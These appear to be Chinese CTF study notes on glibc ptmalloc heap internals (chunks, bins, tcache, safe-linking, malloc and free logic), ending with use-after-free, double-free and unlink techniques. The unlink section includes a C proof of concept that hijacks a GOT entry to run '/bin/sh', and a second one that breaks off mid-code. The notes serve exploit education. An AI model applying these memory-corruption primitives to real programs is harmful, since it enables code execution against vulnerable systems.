参考文章

https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/introduction/

https://www.cnblogs.com/ve1kcon/p/18071091

https://iyheart.github.io/2024/10/11/CTFblog/PWN%E7%B3%BB%E5%88%97blog/Linux_pwn/2.%E5%A0%86%E7%B3%BB%E5%88%97/PWN%E5%A0%86unlink/index.html

https://eastxuelian.nebuu.la/glibc/glibc-simple

https://www.roderickchan.cn/zh-cn/2023-02-27-house-of-all-about-glibc-heap-exploitation/#21-house-of-spirit

https://zikh26.github.io/posts/501cca6.html

https://zp9080.github.io/post/%E5%A0%86%E6%9D%82%E8%AE%B0/%E9%AB%98%E7%89%88%E6%9C%ACoff-by-null/

https://blog.csdn.net/qq_41683953/article/details/136767925

http://124.220.191.5/2025/09/13/off-by-null/index.html

https://9anux.org/2024/08/06/house%20of%20water%20&%20TFCCTF%202024%20MCGUAVA/

https://zephyr369.online/houseofwater/

https://bbs.kanxue.com/thread-268245.htm

https://enllus1on.github.io/2024/01/22/new-read-write-primitive-in-glibc-2-38/#more%EF%BC%8C%E6%94%B9%E8%BF%9B%E5%90%8E%E5%B0%B1%E4%B8%8D%E9%9C%80%E8%A6%81wide_data%E4%BA%86

https://zp9080.github.io/post/%E5%A0%86%E6%94%BB%E5%87%BBio_file/house-of-apple1/

https://196082.github.io/2022/08/05/house-of-apple2/

https://www.cnblogs.com/mazhatter/p/18475601

https://blog.csome.cc/p/house-of-some/

https://nicholas-wei.github.io/2022/02/07/tcache-stashing-unlink-attack/

https://xz.aliyun.com/spa/#/news/5139

https://blog.csdn.net/qq_45323960/article/details/123810198?ops_request_misc=&request_id=&biz_id=102&utm_term=io_file&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-1-123810198.142^v102^pc_search_result_base8&spm=1018.2226.3001.4187

https://bbs.kanxue.com/thread-272098.htm

https://bbs.kanxue.com/thread-275968.htm

https://www.cameudis.com/2024/04/18/BlackHatMEA2023-House-of-Minho.html

堆的结构和管理

ptmalloc

brk

int brk(const void *addr)

参数为新的堆顶,返回值:成功返回0,否则为-1

sbrk

void* sbrk(intptr_t incr)

参数为堆增加的大小(可以是负数和零),返回新的堆顶的地址

mmap

void *mmap(void *addr, size_z length, int prot,int flags,int fd, off_t offset)

其中,参数的含义如下: - start:映射区的开始地址,通常设置为NULL,表示由系统确定地址。 - length:映射区的长度。 * prot:映射区的保护权限,可以是PROT_EXECPROT_READPROT_WRITEPROT_NONE的组合。 - flags:影响映射区域的各种特性,如MAP_SHAREDMAP_PRIVATEMAP_FIXED等。 - fd:要映射到内存中的文件描述符,通常由open函数返回。 - offset:文件映射的偏移量,通常设置为0

成功返回被映射区的指针,失败时返回MAP_FAILED

munmap

int munmap(void *addr, size_t length)

参数startmmap返回的地址,length是映射区的大小

成功执行时返回0,失败时返回-1

mmap()和brk()/sbrk()这两种不同方式申请的堆内存是互相独立的,各自管理不同的内存区域,使用mmap时并不会自动调整brk指针

chunk

struct malloc_chunk {    
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */

struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;

/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};

下面我们来看 chunk 结构体,各个字段的具体的解释如下:

  • prev_size, 如果该 chunk 的 物理相邻的前一地址 chunk(两个指针的地址差值为前一 chunk 大小) 是空闲的话,那该字段记录的是前一个 chunk 的大小 (包括 chunk 头)。否则,该字段可以用来存储物理相邻的前一个 chunk 的数据。这里的前一 chunk 指的是较低地址的 chunk 
  • size ,该 chunk 的大小,大小必须是 MALLOC_ALIGNMENT 的整数倍。如果申请的内存大小不是 MALLOC_ALIGNMENT 的整数倍,会被转换满足大小的最小的 MALLOC_ALIGNMENT 的倍数,这通过 request2size() 宏完成。32 位系统中, MALLOC_ALIGNMENT 可能是 4 或 8 ;64 位系统中,MALLOC_ALIGNMENT 是 8
    • 该字段的低三个比特位对 chunk 的大小没有影响,它们从高到低分别表示
    • NON_MAIN_ARENA,记录当前 chunk 是否不属于主线程,1表示不属于,0表示属于
    • IS_MAPPED,记录当前 chunk 是否是由 mmap 分配的,M=1为mmap映射区域分配,M=0heap区域分配
    • PREV_INUSE,记录前一个 chunk 块是否被分配
      • 一般来说,堆中第一个被分配的内存块的 size 字段的 P位都会被设置为 1
      • p=1时,表示前一个chunk正在使用,prev_size无效
      • 当一个 chunk 的 sizeP 位为 0 时,我们能通过 prev_size 字段来获取上一个 chunk 的大小以及地址
  • fd,bk。 chunk 处于分配状态时,从 fd 字段开始是用户的数据。 chunk 空闲时,会被添加到对应的空闲管理链表中,其字段的含义如下
    • fd 指向下一个(逻辑相邻,见后文)空闲的 chunk 
    • bk 指向上一个(逻辑相邻)空闲的 chunk 
    • 通过 fdbk 可以将空闲的 chunk 块加入到空闲的 chunk 块链表进行统一管理。
  • fd_nextsize, bk_nextsize,也是只有 chunk 空闲的时候才使用,不过其用于较大的 chunk(large chunk)
    • fd_nextsize 指向前一个与当前 chunk 大小不同的第一个空闲块,不包含 bin 的头指针。
    • bk_nextsize 指向后一个与当前 chunk 大小不同的第一个空闲块,不包含 bin 的头指针。
    • 一般空闲的 large chunk 在 fd 的遍历顺序中,按照由大到小的顺序排列。这样做可以避免在寻找合适 chunk 时挨个遍历

使用prev_sizesize表达时,前一个(后一个)chunk含义通常是地址上相邻的低地址(高地址)的chunk

而使用fdbk表达时,前一个(后一个)chunk含义通常是对应bins链条上的链头方向(链尾方向)相邻的chunk

// 获取用户数据部分的指针  
#define chunk2mem(p) ((void*)((char*)(p) + 2 * sizeof(size_t)))

// 从用户数据指针获取chunk指针
#define mem2chunk(mem) ((mchunkptr*)((char*)(mem) - 2 * sizeof(size_t)))

// 获取下一个chunk的指针
#define next_chunk(p) ((mchunkptr*)((char*)(p) + ((p)->size & ~0x7)))

我们称前两个字段 prev_size 和 size 称为 chunk header,后面的部分称为 user data。每次 malloc 返回的内存指针,其实指向 user data 的起始处

malloc_state

在多线程程序中,如果所有的线程都是从同一个地方分配内存,资源的竞争就会非常的激烈,性能就会特别差,为了解决这个问题,ptmalloc引入了arena(区域)的概念,这样多个线程可以分摊到多个arena进行内存分配,减少了资源的竞争

heap区域只有一个main_arenammap区域有多个not_main_arena,然后通过链表链起来

main_arena 的 malloc_state 并不是 heap segment 的一部分,而是一个全局变量,存储在 libc.so 的数据段

struct malloc_state { 
/* Serialize access. */
__libc_lock_define(, mutex);
/* Flags (formerly in max_fast). */
int flags;
int have_fastchunks;
/* Fastbins */
mfastbinptr fastbinsY[ NFASTBINS ]; // fastbinY[10]
/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;
/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;
/* Normal bins packed as described above */
mchunkptr bins[ NBINS * 2 - 2 ]; // bins[254]
/* Bitmap of bins, help to speed up the process of determinating if a given bin is definitely empty.*/
unsigned int binmap[ BINMAPSIZE ];
/* Linked list, points to the next arena */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on the free list. Access to this field is serialized by free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
bins[]下标 size
0 unsortedbin fd
1 unsortedbin bk
2 smallbin fd 0x20~0x30
3 smallbin bk 0x20~0x30
4 smallbin fd 0x30~0x40
5 smallbin bk 0x30~0x40
124 smallbin fd 0x3f0~0x400
125 smallbin bk 0x3f0~0x400
126 largebin fd 0x400~0x430
127 largebin bk 0x400~0x430

top chunk

  • 第一次使用malloc时向系统申请内存放入top chunk中,此时av->top会指向top chunkprev_size位,然后从top chunk中切割一块chunk
  • 再次使用malloc时先判断bins中是否有符合要求的空闲堆,没有的话就从top chunk中切割一块,然后更新main_arenatop指针
  • 如果申请的堆块大小大于top chunk大小,则通过系统调用申请额外内存,拓展到top chunk

bins

bin是一个由struct chunk结构体组成的链表,负责管理free chunk

#include <stddef.h>  

typedef struct malloc_chunk* mchunkptr;
typedef struct malloc_chunk *mfastbinptr;
// 内存块结构定义
typedef struct malloc_chunk {
size_t prev_size; // 前一个块的大小
size_t size; // 当前块的大小
struct malloc_chunk* fd; // 前向指针
struct malloc_chunk* bk; // 后向指针
} mchunkptr;

// 分配器状态结构定义
typedef struct malloc_state {
mchunkptr* fastbinsY[10]; // fast bins数组,简化为10个大小
mchunkptr* unsorted_bin; // unsorted bin链表头
mchunkptr* smallbins[64]; // small bins数组,简化为64个大小
mchunkptr* largebins[64]; // large bins数组,简化为64个大小
// 其他管理信息
} mstate;

// 初始化malloc_state
void init_malloc_state(mstate* state) {
for (int i = 0; i < 10; ++i) {
state->fastbinsY[i] = NULL;
}
state->unsorted_bin = NULL;
for (int i = 0; i < 64; ++i) {
state->smallbins[i] = NULL;
state->largebins[i] = NULL;
}
}

fastbin

  • 大小:0x20~0x80(包括头,由global_max_fast决定)
  • 个数:10条链
  • 单向链表,使用fd连接,添加和移除都是对链表头操作,LIFO(后进先出)
  • fastbinschunksize最后一位始终置1,这是为了防止fastbinchunk的内存合并,以便快速分配
  • 在释放时只会对链表指针头部的chunk进行校验,也就是说连续重复释放同一个chunk才会报错

unsortedbin

  • 大小:无限制
  • 个数:1个链表
  • 双向链表,从链头插入,从链尾取出
  • 当用户释放的堆块不在fastbintcache中或者fastbins合并后的chunk都会首先进入unsortedbin

smallbin

  • 大小:小于0x400
  • 个数:62
  • 双向链表,FIFO,从链头插入,从链尾取出
  • 放入smallbin的条件
    • 符合大小范围
    • 释放堆到unsortedbin,再申请一个不在unsortedbinsmallbin中的堆,这样先前被放入unsortedbin的堆就会被放入smallbin

largebin

  • 大小:大于0x400
  • 个数:63
  • 使用fd_nextsizebk_nextsize连接
  • 同一个largebin链条中每个chunk的大小可以不一样
  • large chunk可以添加、删除在large bin的任何一个位置
  • 同一个largebin中的所有chunk按照大小进行从大到小的排列:最大的chunk放在一个链表的链头,最小的chunk放在链尾;相同大小的chunk按照最近使用顺序排序
  • 对比链表链头chunksize,如果足够大,就从链尾开始遍历该large bin,找到第一个size相等或接近的chunk进行分配,如果该chunk大于用户请求的size的话,就将该chunk拆分为两个chunk:前者进行分配并且size等同于用户请求的size;剩余的部分做为一个新的chunk添加到unsorted bin
  • 如果该large bin中最大的chunksize小于用户请求的size的话,那么就通过binmap找到了下一个非空的large bin的话,按照上一段中的方法分配chunk,无法找到则使用top chunk来分配合适的内存
  • free操作类似于smallbin
数量 公差
1 32 64
2 16 512
3 8 4096
4 4 32768
5 2 262144
6 1 不限制

tcache

  • 大小:小于0x400

  • 类似fastbinLIFO,头插法

  • free 内存,且 size 小于 0x400

    • 先放到对应的 tcache 中,直到被填满(默认是 7 个)
    • 填满之后放到 fastbin 或者 unsorted bin
    • tcache 中的 chunk 不会合并(不取消 inuse bit
  • malloc 内存,且 sizetcache 范围内

    • 先从 tcachechunk,直到 tcache 为空,再从 bin 中找
    • tcache 为空时,如果 fastbin/smallbin 中有 size 符合的 chunk,会先把 fastbin/smallbin 中的 chunk 放到 tcache 中,直到填满。之后再从 tcache 中取;因此 chunkbin 中和 tcache 中的顺序会反过来

  • tcache链表指向的直接是用户地址,而不是之前bin指向的是header的地址

    /* 每个线程都有一个这个数据结构,所以他才叫"perthread"。保持一个较小的整体大小是比较重要的。 */  
    // TCACHE_MAX_BINS的大小默认为64

    // 在glibc2.26-glibc2.29中,counts的大小为1个字节,因此tcache_perthread_struct的大小为1*64 + 8*64 = 0x250(with header)
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    } tcache_entry;

    typedef struct tcache_perthread_struct
    {
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
    } tcache_perthread_struct;

    //在glibc2.29及以上版本中加入了key,在2.33及以下是使用tcache_perthread_struct的地址,在2.34及以上是使用随机值,可以使用p/x tcache_key检验,放入tcache中会增添key,取出tcache会置空key
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
    }tcache_entry;

    typedef struct tcache_perthread_struct
    {
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS]
    } tcache_perthread_struct;

    // 在glibc2.30及以上版本中,counts的大小为2个字节,因此tcache_perthread_struct的大小为2*64 + 8*64 = 0x290(with header)

    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
    }tcache_entry;

    typedef struct tcache_perthread_struct
    {
    uint16_t counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS]
    } tcache_perthread_struct;

    //在2.32版本,ptmalloc引入了PROTECT_PTR,即保护指针的概念,其指针是被异或加密的,如果对系统的堆地址一无所知,将无法正确解读泄露的指针的真实值

    static __always_inline void
    tcache_put (mchunkptr chunk, size_t tc_idx)
    {
    tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

    /* Mark this chunk as "in the tcache" so the test in _int_free will
    detect a double free. */
    e->key = tcache_key;

    e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
    }

    /* Caller must ensure that we know tc_idx is valid and there's
    available chunks to remove. Removes chunk from the middle of the
    list. */
    static __always_inline void *
    tcache_get_n (size_t tc_idx, tcache_entry **ep)
    {
    tcache_entry *e;
    if (ep == &(tcache->entries[tc_idx]))
    e = *ep;
    else
    e = REVEAL_PTR (*ep);

    if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");

    if (ep == &(tcache->entries[tc_idx]))
    *ep = REVEAL_PTR (e->next);
    else
    *ep = PROTECT_PTR (ep, REVEAL_PTR (e->next));

    --(tcache->counts[tc_idx]);
    e->key = 0;
    return (void *) e;
    }

在新的entryputtcache的时候,其fd将会与0异或,换言之,没有被加密,利用这一点,可以轻松泄露heap地址

#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

how2heap展示的解第二个freetcachefd指针

long decrypt(long cipher)
{
    puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,");
    puts("because of the 12bit sliding.");
    puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)");
    long key = 0;
    long plain;
    for(int i=1; i<6; i++) {
        int bits = 64-12*i;
        if(bits < 0) bits = 0;
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12;
        printf("round %d:\n", i);
        printf("key:    %#016lx\n", key);
        printf("plain:  %#016lx\n", plain);
        printf("cipher: %#016lx\n\n", cipher);
    }
    return plain;
}

写成python

def decrypt(cipher):
    key = 0
    plain = 0
    for i in range(1, 6):
        bits = 64 - 12 * i
        if bits < 0:
            bits = 0
        plain = ((cipher ^ key) >> bits) << bits
        key = plain >> 12
        #print(f"round {i}:")
        #print(f"key:    0x{key:016x}")
        #print(f"plain:  0x{plain:016x}")
        #print(f"cipher: 0x{cipher:016x}\n")
    return plain

if __name__ == "__main__":
    b = 0x55500000c7f9
    plaintext = decrypt(b)
    print(f"recovered value: 0x{plaintext:016x}")
   
#recovered value: 0x00005555555592a0

堆的初始化和管理流程

我们集中分析2.35malloc管理机制,并在此基础上描述各个版本的变化

2.35

malloc
  • malloc() -> __libc_malloc() -> _int_malloc()

  • 通过__malloc_initialized判断ptmalloc_init是否进行过了

    • 假如没有,则初始化
    • 初始化tcache_key
    • malloc_init_state,使用bin_at (av, i)循环遍历所有 bin(从 1 到 127),并将每个 bin 的 fdbk 指针指向自身,从而形成循环链表结构
  • checked_request2size将请求内存大小转换为实际大小

  • csize2tidx将大小转换为idx,使用MAYBE_INIT_TCACHE判断是否初始化tcache

    • 假如没有初始化,则初始化

    • 使用_int_malloc申请一个堆块作为tcache_perthread_struct

  • 判断tcache是否有空闲堆块,并且是否可以使用tcache分配

    • 若可以,则使用tcache_get分配堆块
    • 检查tcache->entries[tc_idx]是否内存对齐
    • tcache->entries[tc_idx] = REVEAL_PTR (e->next),取下一个堆块解密后的指针置于tcache_perthread_struct
    • --(tcache->counts[tc_idx])
    • 清空当前的tcache_key后返回堆块
  • 进入到_int_malloc

  • 先尝试从fastbins中分配出去

    • 判断是否global_max_fast <= MAX_FAST_SIZE,是则判断申请的实际大小是否小于global_max_fast

    • 假如对应的idx中有bin则判断fastbin链头的块是否内存对齐

    • *fb = REVEAL_PTR (victim->fd)main_arena对应索引的fastbin链头进行修改

    • 校验从 fastbin 中取出的 chunksize 对应的索引,是否和当前 fastbin 链表的索引一致

    • 再判断对应的大小的tcache是否有空位,fastbin链表中是否有多余的chunk

      • *fb = REVEAL_PTR (victim->fd)main_arena对应索引的fastbin链头进行修改
      • 使用tcache_put放入tcache中,安放tcache_key和加密tcache->next
      • 不断进行
  • 再尝试从smallbins中分配出去(0x400)

    • 取对应idx的链尾chunk作为victim
    • 检验是否(victim->bk)->fd == victim
    • victim设置inuse_bit,并将victim解链
    • 再判断对应的大小的tcache是否有空位,smallbin链表中是否有多余的chunk
      • bck = tc_victim->bk;bin->bk = bck;bck->fd = binsmallbin链进行修改,同样设置inuse_bit
      • 使用tcache_put放入tcache中,安放tcache_key和加密tcache->next
      • 不断进行
  • 进行malloc_consolidate,将fastbins中的chunk转移到unsortedbin

    • 检查是否内存对齐

    • 检查fastbin中的堆块头的大小是否与所在链的大小相同

    • do_check_inuse_chunk(check_inuse_chunk)

      • do_check_chunk通过main_arena中的topsystem_mem确定max_addressmin_address,如果不是mmap分配的话则判断是否为top_chunk,是则断言top_chunksize不小于MINSIZE并且设置了prev_inuse,否则断言处于max_addressmin_address中间
      • 断言当前chunk的下一个chunk没有设置prev_inuse
      • 通过当前chunkprev_inuse位判断上一个chunk是否被使用,假如没有则判断当前chunkprev_size和上一个chunksize是否相等,并对上一个chunk执行do_check_free_chunk
        • 断言没有被使用、不是mmap分配的、大小不小于MINSIZE、内存对齐、当前chunksize与下一个chunkprev_size是否相等、上一个chunk被使用、下一个chunktop_chunk或被使用、link链表是正常的
      • 判断下一个chunk是否是top_chunk,是则断言top_chunksize不小于MINSIZE并且设置了prev_inuse,否则对下一个chunk执行do_check_free_chunk
    • 利用当前chunk的位置和大小确定下一个chunk的位置,从而得到下一个chunk的大小

    • 假如当前chunkprev_inuse位,则利用当前chunk的位置和prev_size确定上一个chunk的位置,验证上一个chunk的大小是否与当前chunkprev_size相等,通过验证后进行unlink

    • 当前chunk的下一个chunk如果不为top chunk

      • 通过下一个chunk的下一个chunkprev_inuse位确定下一个chunk是否被使用
        • 如果下一个chunk被使用,则将下一个chunkprev_inuse位设置为0
        • 否则合并,进行unlink
      • 如果在largebin的大小范围则将fd_nextsizebk_nextsize置为NULL
      • 将合并后的chunk插入unsortedbin链表头,并设置合并后chunksize位和物理相邻的后一个chunkprev_size
    • 当前chunk的下一个chunk如果为top chunk,则将当前chunk合并入top chunk

    • 遍历完每一条fastbins的链中的每一个空闲chunk

  • 从链尾到链头遍历 unsortedbin 中的 chunk

    • 检查当前chunk和物理相邻的下一个chunk的大小大于2*SIZE_SZ小于system_mem、当前chunksize和物理相邻的下一个chunkprev_size、物理相邻的下一个chunkprev_inuseunsortedbin链上当前chunk的上一个chunkfd是否是当前chunk
    • 如果 unsortedbin 只有一个chunk,并且这个chunk 在上次分配时被使用过,并且所需分配的 chunk 大小属于 smallbins,且 chunk 的大小不小于nb + MINSIZE(确保分割后还可以使用),这种情况下就直接将该 chunk 进行切割,剩下的部分继续留在 unsortedbin 里,并且剩下部分如果不在smallbin范围中则清空fd_nextsizebk_nextsize
    • 否则会从后往前一直整理这些chunk,根据 chunk 的空间大小将其放入所属 smallbin 链或是 largebin 链中,一直整理直到遇到 chunk_size = nb 的 chunk,或者说整理到 bin 链为空
      • smallbin则插入链头
      • largebin如果为空则直接设置victim->fd_nextsize = victim->bk_nextsize = victim,如果比当前largebin链的最后一个chunk的大小还要小,则将当前chunk插入链表尾,并将当前chunkfd_nextsize设为链表头,bk_nextsize设为链表头的bk_nextsize,将链表头的bk_nextsizefd_nextsize设为victim,将链表头的bk_nextsize设为victim(也就是将插入第二个链表,这个链表只有第一个出现某大小的chunk,便于快速查找);否则通过fd_nextsize遍历找到第一个不小于当前chunk大小的链,如果等于当前chunk大小的则插入该大小链的第二个位置,大于则插入到第二条链中去,要保证两条链是完整的fwd->bk_nextsize->fd_nextsize == fwd && bck->fd == fwd
      • unsortedbin 链里有多个 chunk 的情况时,chunk 不是直接在 unsortedbin 里面被切割的
      • 如果是只有一个的话就是直接切割
  • 遍历largebins,按照 smallest-first,best-fit 原则,找一个合适的 chunk,从中划分一块所需大小的 chunk,并将剩下的部分链入到 unsortedbin

  • 尝试从 top chunk 中分配所需 chunk

    • 检查top_chunksize要小于main_arena->system_mem
    • 假如申请的堆块总大小nb < top_chunk_size + MINSIZE,则从中割出一块分配
  • 还没能分配成功的话就到 sysmalloc 

free
  • 检查被freeaddr是否为0,为零直接返回
  • 修改addr指向chunk
  • 检查是否由mmap分配,是则单独处理,调用munmap_chunk()释放内存
  • 获取该chunkarena调用_int_free传入arena_ptrchunk_addr0(一个锁)
  • 检查要保证p <= (uintptr_t) -size、地址和大小内存对齐、大小不小于MINSIZE
  • do_check_inuse_chunk(check_inuse_chunk),详见malloc部分
  • 检查是否能被链入tcache
    • 检查要freechunk是否存在tcache_key
    • 遍历对应索引的链,保证链条中chunk的数目小于7,并且地址对齐,并且其中的chunk不能与要freechunk相同
    • 假如对应链条还没有满,则放入tcache对应索引的链头,放入tcache_key并加密指针
  • 如果大小处于fastbin的范围并且物理相邻的下一个chunk不是top_chunk
    • 保证物理相邻的下一个chunk的大小大于2 * SIZE_SZ并小于av->system_mem
    • 对于单线程,假如对应大小的链条的头chunk与当前要freechunk相同,则插入链头
    • 并再次检查旧的链条头的chunksize对应的索引是否是当前链条的索引
  • 对于不是mmap分配的,则进行一系列检查
    • 先获得分配区的锁
    • freechunk不能是top chunk
    • freechunk是通过sbrk()分配的,且下一个相邻的chunk地址不能超过了top chunk末尾
    • freechunk的下一个相邻的chunksize的标志位要标志当前free chunk处于inuse
    • freechunk的下一个相邻 chunk 的大小,该大小要大于等于 2*SIZE_SZ 并且小于av->system_mem
    • 检查物理相邻的前一个堆是否空闲,空闲的话判断物理相邻的前一个堆的size与当前freechunkprev_size是否相同,通过则前向合并
    • 后一个堆如果不是top chunk,则判断是否空闲,空闲的话后向合并,否则检查unsortedbinav与链头的chunk的指针是否完整,通过则插入unsortedbin的链头
    • 后一个堆如果是top chunk则直接合并
  • 进行一系列操作
    • 如果合并后的chunk大小大于0x10000,并且fastbins存在空闲chunk,调用malloc_consolidate
    • top chunk大小大于heap收缩阈值,则收缩
    • 获得了分配区的锁则对分配区解锁
  • mmap分配的单独处理

其他版本

版本号 malloc free 其他
  • 使用场景:
    • malloc
      • large bin
      • 遍历unsortedbin
      • 从比请求的chunk所在的bin大的bin中取chunk
    • free
      • 后向合并(合并物理相邻低地址空闲chunk)
      • 前向合并(除了top chunk
    • malloc_consolidate
      • free
    • realloc
      • 前向拓展(除了top chunk

malloc_consolidate

  • 触发点:
    • _int_malloc_:一个sizesmallbin、largebinchunk正在被分配,或没有适合的bins被寻找重新申请回去并且top chunk太小了不能满足malloc的申请
    • _int_free:如果这个chunk不小于FASTBIN_CONSOLIDATION_THRESHOLD (65536)
    • malloc_trim:总是调用
    • _int_mallnfo
    • mallopt:总是调用
  • _int_malloc_(large size)
    • fastbin中堆与top chunk相邻
    • fastbin中堆不与top chunk相邻
    • 合并fastbin中物理相邻的堆块(不同大小也可以)

*heap_info

#define HEAP_MIN_SIZE (32 * 1024) 
#ifndef HEAP_MAX_SIZE
# ifdef DEFAULT_MMAP_THRESHOLD_MAX
# define HEAP_MAX_SIZE (2 * DEFAULT_MMAP_THRESHOLD_MAX)
# else
# define HEAP_MAX_SIZE (1024 * 1024) /* must be a power of two */
# endif
#endif
/* HEAP_MIN_SIZE and HEAP_MAX_SIZE limit the size of mmap()ed heaps that are dynamically created for multi-threaded programs. The maximum size must be a power of two, for fast determination of which heap belongs to a chunk. It should be much larger than the mmap threshold, so that requests with a size just below that threshold can be fulfilled without creating too many heaps. */
/***************************************************************************/
/* A heap is a single contiguous memory region holding (coalesceable) malloc_chunks. It is allocated with mmap() and always starts at an address aligned to HEAP_MAX_SIZE. */
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;

Arbitrary R/W/X

UAF

对已经释放的堆块操作具有极高的危险性,因为释放的堆块存储的指针被修改可能会造成堆块的管理失控,造成malloc返回的指针异常

而对堆块的操作一般是通过指针进行的,常规的题目中基本上都是对malloc返回的指针进行记录、写入、释放等等

常见的菜单题会保存堆指针供给用户进行各种操作,虽然程序的设计者设想的是添加->修改->删除,但是别有用心的添加->删除->修改对于程序(如果不置空保存的指针)也是合法的(堆块是否被free是不会被elf本身所记录),这样对堆块的管理产生的破坏可能是毁灭性的,轻则程序崩溃,重则恶意控制

总之,就是对已经释放的堆块还可以进行操作

通常是因为全局指针变量没有置空

  • 漏洞:free(ptr)后没有ptr=NULL

fd、bk的控制可以伪造对应bins链上有一个虚假的chunk,只要这个chunk合法即可被malloc从对应bins链上申请到,并返回指针供用户操作

比如

free(chunk)							// fastbin[] -> chunk
edit(chunk->fd = target_addr) // fastbin[] -> chunk -> fake_chunk
target[0] = 0 // legalize fake_chunk
target[1] = fake_size
malloc(chunk)
malloc(target)

double free

double free实际在bins中放入了相同的chunk

假设在free后无法篡改指针则可以使用此漏洞(比如无edit

申请出来第一个chunk时进行修改时就会影响还在bins中的同一个chunk,这样就可以影响堆块的分配

实际上也是实现了UAF

#这里free(chunk1)是指释放chunk1,只是为了方便表达
free(chunk1) // fastbin[] -> chunk1
free(chunk2) // fastbin[] -> chunk2 -> chunk1
free(chunk1) // fastbin[] -> chunk1 -> chunk2 -> chunk1

malloc(chunk1) // fastbin[] -> chunk2 -> chunk1
edit(chunk1->fd = target_addr) // fastbin[] -> chunk2 -> chunk1 -> target_addr
malloc(chunk2)
malloc(chunk1)
malloc(target_addr)

当没有UAF时,溢出可以伪造出堆块进行UAF

  • 漏洞:off by ... 、堆溢出

unlink的想法是利用两个相邻的堆块,在低地址的堆块中间伪造一个已经被释放的堆块,然后释放处于高地址的堆块(这个要释放到unsortedbin中),这样就会与伪造的堆块合并并释放到unsortedbin中,这样我们就可以通过控制原来的低地址的堆块来控制合并后的堆块的prev_size、size、fd、bk等等(堆块堆叠)

伪造的堆块首先要获得堆块的地址,无论是全局变量储存的地址还是残留的地址或者是输入构造的

在低地址的堆块的伪造需要控制size、fd、bksize保证伪造的堆块大小与高地址堆块相邻,将fd设置为存储着伪造的堆块头地址的地址减去0x18,将bk设置为存储着伪造的堆块地址的地址减去0x10

在高地址的堆块控制prev_sizesize,将prev_size改得和低地址的堆块的size相同,并将sizeprev_inuse位置为0

在经过合并后,原来存储着伪造的堆块头地址的地址会变成该地址减去0x18,也就是变成伪造的fd

如果没开FULL RELOC保护,并且修改的是全局变量,并且可以使用edit,那么可以直接对全局变量进行edit,它会把fd-0x18当作是堆块的地址,修改时可以先将全局变量覆盖成got表(b'a'*0x18+p64(got)),然后此时会将got表当作堆块的地址,然后再修改got表就行了

malloc(chunk1)
malloc(chunk2)
edit(chunk1->fd = 0)
edit(chunk1->bk = chunk_size-0x10)
edit(chunk1->bk+0x8 = chunk1_ptr_addr-0x18)
edit(chunk1->bk+0x10 = chunk1_ptr_addr-0x10)
edit(chunk2->prev_size = chunk_size-0x11)
edit(chunk2->size = chunk_size-0x1)
free(chunk2)

#pre_chunk1->bk+0x8 = chunk1->bk+0x10 = main_arena+...
#chunk1->chunk1_ptr_addr-0x18
edit(chunk1_ptr_addr = got) #leak libc
...

比如利用了全局变量

// glibc-2.39 : gcc -g -o ./1 ./1.c -z lazy
#include <stdio.h>
#include <stdlib.h>

long long *p,*p_copy;

int main(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
char* n[8];
for(int i=0;i<7;i++){
n[i] = (char*)malloc(0x90);
}
p = (long long *)malloc(0x40);
p_copy=p;
n[7] = (char*)malloc(0x90);
malloc(0x10);

p[0]=0;
p[1]=0x41;
p[2]=(long long)&p-0x18;
p[3]=(long long)&p-0x10;
p[8]=0x40;
p[9]=0xa0;
for(int i=0;i<7;i++){
free(n[i]);
}
free(n[7]);

p[3]=(long long)&p_copy-0x78;
long long libc=(long long)p[3]-0x2fe00;
p[0]=libc;

char *attack=(char*)malloc(0x100);
attack[0]='/';
attack[1]='b';
attack[2]='i';
attack[3]='n';
attack[4]='/';
attack[5]='s';
attack[6]='h';
free(attack);

return 0;
}

或者在FULL RELOC时联用其他手法(smallbin reverse into tcache、house of apple2

// glibc-2.39 : gcc -g -o ./1 ./1.c

#include <stdio.h>
#include <stdlib.h>

long long *p,*p_copy;

int main(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
char* n[8];
for(int i=0;i<7;i++){
